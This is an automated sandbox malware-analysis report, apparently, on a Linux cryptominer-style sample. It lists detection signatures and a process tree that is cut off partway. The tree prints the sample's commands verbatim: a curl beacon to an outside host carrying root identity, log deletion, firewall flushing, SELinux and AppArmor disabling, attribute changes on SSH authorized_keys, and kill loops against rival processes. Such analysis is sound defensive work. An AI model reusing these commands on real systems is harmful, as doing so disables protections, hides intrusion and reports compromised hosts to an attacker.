e958305ce1aba8b1314c35d65ce711e9336d55e1b445560adc053c4446a32d60

Analysis

max time kernel
150s
max time network
143s
platform
debian-9_mips
resource
debian9-mipsbe-20240226-en
resource tags

arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
19-04-2024 00:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f92072637a0d5eede9213405cca50f48_JaffaCakes118
Size

61KB
MD5

f92072637a0d5eede9213405cca50f48
SHA1

c326fafaf0b92a501e99286f7ceb4a0313f97eae
SHA256

e958305ce1aba8b1314c35d65ce711e9336d55e1b445560adc053c4446a32d60
SHA512

4d1ae93e239790a484785df89f662fa2b04accc89d79e6367ad7c84731b9b53badaa9afba4d0281dabcdc5d3a94c25f901b86e4dfaec1706cf63b5e8c4100afb
SSDEEP

1536:8F2cc2/ndOQvL0KKBoLdAkKFOmm5air0TIe:8F2ccQGoL2v47ccyIe

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

ioc	pid	Process
/usr/bin/tntrecht	2376

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

Processes:

iptables

pid	Process
736	iptables

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

Processes:

f92072637a0d5eede9213405cca50f48_JaffaCakes118

description	ioc	Process
File opened for modification	/etc/resolv.conf	f92072637a0d5eede9213405cca50f48_JaffaCakes118

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargs

pid	Process
1109	xargs
1470	xargs
1676	xargs
2117
949	xargs
1011	xargs
1614	xargs
1638	xargs
833	xargs
1266	xargs
1662	xargs
2122
920	xargs
1592	xargs
846	xargs
1563	xargs
1674	xargs
1722	xargs
1977
1980
2293
971	xargs
1548	xargs
1276	xargs
1896
1958
2119
1071	xargs
1249	xargs
1660	xargs
1712	xargs
2047
1390	xargs
1512	xargs
1350	xargs
1518	xargs
1670	xargs
1964
733	chattr
1332	xargs
1618	xargs
1965
2067
2268
2280
2284
854	xargs
1578	xargs
2298
1972
2039
1533	xargs
2275
1963
2011
1370	xargs
1610	xargs
1528	xargs
2300
1306	xargs
1500	xargs
2003
1021	xargs
1395	xargs

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

Processes:

description	ioc	Process
File opened for modification	/etc/crontab

Disables AppArmor 52 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	Process
765	systemctl
2068
2096
2097
2068
2103
765	systemctl
2071
2068
2106
2088
765	systemctl
2087
2091
765	systemctl
2100
2081
2068
2105
2088
2079
2082
2088
2076
2095
785	systemctl
2085
2101
2088
2093
2088
784	systemctl
2073
2084
2086
2068
2077
2078
2080
2317
2099
2104
765	systemctl
2083
2088
2107
786	systemctl
2075
2102
765	systemctl
2068
2098

Disables SELinux 16 IoCs

Disables SELinux security module.

Processes:

grepkillkillkillkillkillkillkillkillgrepkillkillsetenforcekillgrepkill

pid	Process
1107	grep
1593	kill
936	kill
1593	kill
1593	kill
1593	kill
936	kill
936	kill
936	kill
1571	grep
1593	kill
1593	kill
762	setenforce
936	kill
1247	grep
936	kill

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

pspspspspgreppgreppspspgreppgreppkillexim4pspspkillpspspspspgreppgreppkillpkillpspspspspgreppgreppkillpspspgreppkillpkillpkillpkillpspspgreppgreppgreppkillpkillpkillpspspspgreppgreppgreppspkillpkillpkillpspkillpkillpspspspgrep

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep

Write file to user bin folder 1 TTPs 1 IoCs

Hijack Execution Flow

T1574

Processes:

description	ioc	Process
File opened for modification	/usr/bin/tntrecht

Enumerates kernel/hardware configuration 1 TTPs 51 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspgreppkillpspkillpspspspspspspgreppkillpspspgreppgreppkillpgreppkillpkillpspspgreppgreppkillpkillpspspspspkillpkillpspspgreppgreppspspsawkpspspgreppkillpkillpspspgreppkillps

description	ioc	Process
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/119/stat	ps
File opened for reading	/proc/6/status	pgrep
File opened for reading	/proc/169/status	pkill
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/70/cmdline
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/4/cmdline	ps
File opened for reading	/proc/334/status	ps
File opened for reading	/proc/78/stat	ps
File opened for reading	/proc/72/status	ps
File opened for reading	/proc/328/cmdline	ps
File opened for reading	/proc/1528/cmdline	ps
File opened for reading	/proc/333/cmdline	pgrep
File opened for reading	/proc/119/cmdline	pkill
File opened for reading	/proc/154/stat
File opened for reading	/proc/14/stat	ps
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/709/status	pgrep
File opened for reading	/proc/11/status	pgrep
File opened for reading	/proc/82/status	pkill
File opened for reading	/proc/76/cmdline	pgrep
File opened for reading	/proc/1740/status	pkill
File opened for reading	/proc/10/cmdline	pkill
File opened for reading	/proc/tty/drivers	ps
File opened for reading	/proc/1102/stat	ps
File opened for reading	/proc/669/stat	ps
File opened for reading	/proc/332/cmdline	pgrep
File opened for reading	/proc/6/status	pgrep
File opened for reading	/proc/filesystems	pkill
File opened for reading	/proc/36/status	pkill
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/154/cmdline	ps
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/12/status	pkill
File opened for reading	/proc/699/cmdline	ps
File opened for reading	/proc/326/cmdline	pkill
File opened for reading	/proc/73/stat	ps
File opened for reading	/proc/1247/status	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/376/cmdline	pgrep
File opened for reading	/proc/332/status	pgrep
File opened for reading	/proc/225/status	ps
File opened for reading	/proc/82/stat	ps
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/17/cmdline	ps
File opened for reading	/proc/664/stat	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/14/stat
File opened for reading	/proc/225/stat	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/5/status	pgrep
File opened for reading	/proc/13/status	pkill
File opened for reading	/proc/375/status	pkill
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/709/cmdline	ps
File opened for reading	/proc/73/status	pgrep
File opened for reading	/proc/74/cmdline	pkill
File opened for reading	/proc/2/status	ps

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

Processes:

f92072637a0d5eede9213405cca50f48_JaffaCakes118

description	ioc	Process
File opened for modification	/tmp/svcguard	f92072637a0d5eede9213405cca50f48_JaffaCakes118
File opened for modification	/tmp/svcworkmanager	f92072637a0d5eede9213405cca50f48_JaffaCakes118
File opened for modification	/tmp/svcupdates	f92072637a0d5eede9213405cca50f48_JaffaCakes118
File opened for modification	/tmp/kdevtmpfsi	f92072637a0d5eede9213405cca50f48_JaffaCakes118
File opened for modification	/tmp/redis2	f92072637a0d5eede9213405cca50f48_JaffaCakes118
File opened for modification	/tmp/newsvc.sh	f92072637a0d5eede9213405cca50f48_JaffaCakes118
File opened for modification	/tmp/svcupdate	f92072637a0d5eede9213405cca50f48_JaffaCakes118

/tmp/f92072637a0d5eede9213405cca50f48_JaffaCakes118
/tmp/f92072637a0d5eede9213405cca50f48_JaffaCakes118
1⤵
- Writes DNS configuration
- Writes file to tmp directory
PID:704
- /usr/bin/id
  id
  2⤵
  PID:707
- /usr/bin/curl
  curl "http://oracle.zzhreceive.top/b2f628/idcheck/uid=0(root) gid=0(root) groups=0(root)"
  2⤵
  PID:713
- /bin/mkdir
  mkdir /var/tmp/.system -p
  2⤵
  PID:729
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:730
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:732
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:733
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:736
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:740
- - /sbin/sysctl
    sysctl "kernel.nmi_watchdog=0"
    3⤵
    PID:749
- /sbin/sysctl
  sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:750
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:751
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  PID:752
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:753
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:754
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:755
- /bin/ps
  ps aux
  2⤵
  PID:756
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:757
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:761
- /bin/ps
  ps aux
  2⤵
  PID:760
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:762
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:765
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:766
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:767
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:768
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:772
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:773
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:774
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:775
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:776
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:777
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:778
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:779
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:780
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:781
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:782
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:783
- /usr/local/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:765
- /usr/local/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:765
- /usr/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:765
- /usr/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:765
- /sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:765
- /bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:765
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:784
- /bin/systemctl
  systemctl stop aliyun
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:785
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:786
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:790
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:792
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:791
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:793
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:797
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:796
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:795
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:798
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:804
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:803
- /bin/grep
  grep -v -
  2⤵
  PID:805
- /bin/grep
  grep :443
  2⤵
  PID:802
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:806
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:809
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:810
- /bin/grep
  grep :23
  2⤵
  PID:808
- /bin/grep
  grep -v -
  2⤵
  PID:811
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:812
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:817
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:816
- /bin/grep
  grep -v -
  2⤵
  PID:818
- /bin/grep
  grep :443
  2⤵
  PID:815
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:819
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:824
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:823
- /bin/grep
  grep :143
  2⤵
  PID:822
- /bin/grep
  grep -v -
  2⤵
  PID:825
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:826
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:830
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:829
- /bin/grep
  grep -v -
  2⤵
  PID:832
- /bin/grep
  grep :2222
  2⤵
  PID:828
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:833
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:838
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:837
- /bin/grep
  grep :3333
  2⤵
  PID:836
- /bin/grep
  grep -v -
  2⤵
  PID:839
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:840
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:844
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:843
- /bin/grep
  grep :3389
  2⤵
  PID:842
- /bin/grep
  grep -v -
  2⤵
  PID:845
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:846
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:852
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:851
- /bin/grep
  grep :5555
  2⤵
  PID:850
- /bin/grep
  grep -v -
  2⤵
  PID:853
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:854
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:858
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:857
- /bin/grep
  grep :6666
  2⤵
  PID:856
- /bin/grep
  grep -v -
  2⤵
  PID:859
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:860
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:865
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:864
- /bin/grep
  grep :6665
  2⤵
  PID:863
- /bin/grep
  grep -v -
  2⤵
  PID:866
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:867
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:872
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:871
- /bin/grep
  grep :6667
  2⤵
  PID:870
- /bin/grep
  grep -v -
  2⤵
  PID:873
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:874
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:878
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:879
- /bin/grep
  grep :7777
  2⤵
  PID:877
- /bin/grep
  grep -v -
  2⤵
  PID:880
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:881
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:886
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:885
- /bin/grep
  grep :8444
  2⤵
  PID:884
- /bin/grep
  grep -v -
  2⤵
  PID:887
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:888
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:892
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:891
- /bin/grep
  grep :3347
  2⤵
  PID:890
- /bin/grep
  grep -v -
  2⤵
  PID:893
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:894
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:899
- /bin/grep
  grep :3333
  2⤵
  PID:898
- /bin/grep
  grep -v grep
  2⤵
  PID:897
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:900
- /bin/ps
  ps aux
  2⤵
  PID:896
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:906
- /bin/grep
  grep :5555
  2⤵
  PID:905
- /bin/grep
  grep -v grep
  2⤵
  PID:904
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:903
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:907
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:911
- /bin/grep
  grep -v grep
  2⤵
  PID:910
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  - Reads runtime system information
  PID:912
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:909
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:913
- /bin/grep
  grep log_
  2⤵
  PID:918
- /bin/grep
  grep -v grep
  2⤵
  PID:917
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:919
- /bin/ps
  ps aux
  2⤵
  PID:916
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:920
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:926
- /bin/grep
  grep systemten
  2⤵
  PID:925
- /bin/grep
  grep -v grep
  2⤵
  PID:924
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:927
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:923
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:933
- /bin/grep
  grep netns
  2⤵
  PID:932
- /bin/grep
  grep -v grep
  2⤵
  PID:931
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:934
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:936
- - /usr/local/bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:936
- - /usr/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:936
- - /usr/bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:936
- - /sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:936
- - /bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:936
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:930
- /bin/grep
  grep voltuned
  2⤵
  PID:940
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:941
- /bin/grep
  grep -v grep
  2⤵
  PID:939
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:942
- /bin/ps
  ps aux
  2⤵
  PID:938
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:948
- /bin/grep
  grep darwin
  2⤵
  PID:947
- /bin/grep
  grep -v grep
  2⤵
  PID:946
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:949
- /bin/ps
  ps aux
  2⤵
  PID:945
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:954
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:953
- /bin/grep
  grep -v grep
  2⤵
  PID:952
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:955
- /bin/ps
  ps aux
  2⤵
  PID:951
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:961
- /bin/grep
  grep -v grep
  2⤵
  PID:960
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:962
- /bin/ps
  ps aux
  2⤵
  PID:959
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:963
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:969
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:970
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:971
- /bin/grep
  grep -v grep
  2⤵
  PID:968
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:967
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:978
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:977
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:979
- /bin/grep
  grep -v grep
  2⤵
  PID:976
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:975
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:985
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:984
- /bin/grep
  grep -v grep
  2⤵
  PID:983
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:986
- /bin/ps
  ps aux
  2⤵
  PID:982
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:991
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:990
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:992
- /bin/grep
  grep -v grep
  2⤵
  PID:989
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:988
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:998
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
